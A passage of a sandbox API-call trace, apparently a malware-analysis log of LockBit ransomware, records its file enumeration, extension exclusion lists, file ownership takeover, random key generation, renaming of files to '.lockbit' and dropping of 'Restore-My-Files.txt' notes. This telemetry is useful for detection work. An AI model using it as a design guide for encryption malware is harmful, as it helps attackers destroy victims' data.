ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.169] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.169] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.171] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a4b8b3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70a4b8b3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x0, dwReserved1=0x0, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0086.171] lstrcmpiW (lpString1=".", lpString2="203x8subpicture.png") returned -1 [0086.171] lstrcmpiW (lpString1="..", lpString2="203x8subpicture.png") returned -1 [0086.171] PathFindExtensionW (pszPath="203x8subpicture.png") returned=".png" [0086.171] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0086.171] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0086.171] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0086.171] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0086.171] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0086.171] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0086.171] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0086.172] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0086.172] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0086.172] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0086.172] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0086.172] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0086.172] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0086.172] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0086.172] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0086.173] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0086.173] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0086.173] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="203x8subpicture.png") returned 1 [0086.173] lstrcmpiW (lpString1="ntldr", lpString2="203x8subpicture.png") returned 1 [0086.173] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="203x8subpicture.png") returned 1 [0086.173] lstrcmpiW (lpString1="bootsect.bak", lpString2="203x8subpicture.png") returned 1 [0086.173] lstrcmpiW (lpString1="autorun.inf", lpString2="203x8subpicture.png") returned 1 [0086.173] lstrcmpiW (lpString1="thumbs.db", lpString2="203x8subpicture.png") returned 1 [0086.173] lstrcmpiW (lpString1="iconcache.db", lpString2="203x8subpicture.png") returned 1 [0086.173] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.173] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png") returned=".png" [0086.173] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0086.173] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0086.173] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0086.173] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0086.174] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0086.174] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0086.174] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0086.174] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0086.174] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0086.174] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0086.174] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0086.174] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0086.174] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png.lockbit") returned 87 [0086.174] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\203x8subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.175] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.176] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.176] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.176] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.176] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.176] RtlFreeAnsiString (AnsiString="\\") [0086.176] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0086.176] malloc (_Size=0x200) returned 0x77d800 [0086.176] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0086.176] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.176] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.176] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.177] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.177] CloseHandle (hObject=0x3b8) returned 1 [0086.177] free (_Block=0x77d800) [0086.177] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\203x8subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0086.178] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.178] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.178] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2820) returned 1 [0086.178] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.178] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.178] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.179] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.179] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.186] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.186] malloc (_Size=0xc4) returned 0x1ff1e60 [0086.186] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0086.186] free (_Block=0x1ff1e60) [0086.186] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0086.186] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0086.186] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.186] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7079e029, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7079e029, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5aaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="bandwidth.png", cAlternateFileName="")) returned 1 [0086.186] lstrcmpiW (lpString1=".", lpString2="bandwidth.png") returned -1 [0086.186] lstrcmpiW (lpString1="..", lpString2="bandwidth.png") returned -1 [0086.186] PathFindExtensionW (pszPath="bandwidth.png") returned=".png" [0086.186] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0086.186] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0086.186] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0086.186] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0086.187] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0086.187] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0086.187] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0086.187] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0086.187] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0086.187] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0086.188] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0086.188] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0086.188] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0086.188] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0086.188] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0086.188] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0086.188] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="bandwidth.png") returned 1 [0086.188] lstrcmpiW (lpString1="ntldr", lpString2="bandwidth.png") returned 1 [0086.188] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="bandwidth.png") returned 1 [0086.188] lstrcmpiW (lpString1="bootsect.bak", lpString2="bandwidth.png") returned 1 [0086.188] lstrcmpiW (lpString1="autorun.inf", lpString2="bandwidth.png") returned -1 [0086.188] lstrcmpiW (lpString1="thumbs.db", lpString2="bandwidth.png") returned 1 [0086.188] lstrcmpiW (lpString1="iconcache.db", lpString2="bandwidth.png") returned 1 [0086.188] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.188] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png") returned=".png" [0086.188] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0086.188] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0086.189] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0086.189] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0086.189] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0086.189] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0086.189] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0086.190] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0086.190] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0086.190] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0086.190] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0086.190] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png.lockbit") returned 81 [0086.190] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\bandwidth.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.229] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.230] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.230] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.230] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.230] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.230] RtlFreeAnsiString (AnsiString="\\") [0086.230] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0086.230] malloc (_Size=0x200) returned 0x77d800 [0086.230] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0086.230] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.230] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.230] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.231] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.231] CloseHandle (hObject=0x3b8) returned 1 [0086.231] free (_Block=0x77d800) [0086.231] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\bandwidth.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0086.232] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.232] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.232] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=23215) returned 1 [0086.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.233] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.233] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.346] malloc (_Size=0xb8) returned 0x1ff1e60 [0086.346] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0086.347] free (_Block=0x1ff1e60) [0086.347] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0086.347] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0086.347] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.347] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a25756, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70a25756, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x191f, dwReserved0=0x0, dwReserved1=0x0, cFileName="blackbars80.png", cAlternateFileName="")) returned 1 [0086.347] lstrcmpiW (lpString1=".", lpString2="blackbars80.png") returned -1 [0086.347] lstrcmpiW (lpString1="..", lpString2="blackbars80.png") returned -1 [0086.347] PathFindExtensionW (pszPath="blackbars80.png") returned=".png" [0086.347] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0086.347] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0086.347] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0086.348] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0086.348] 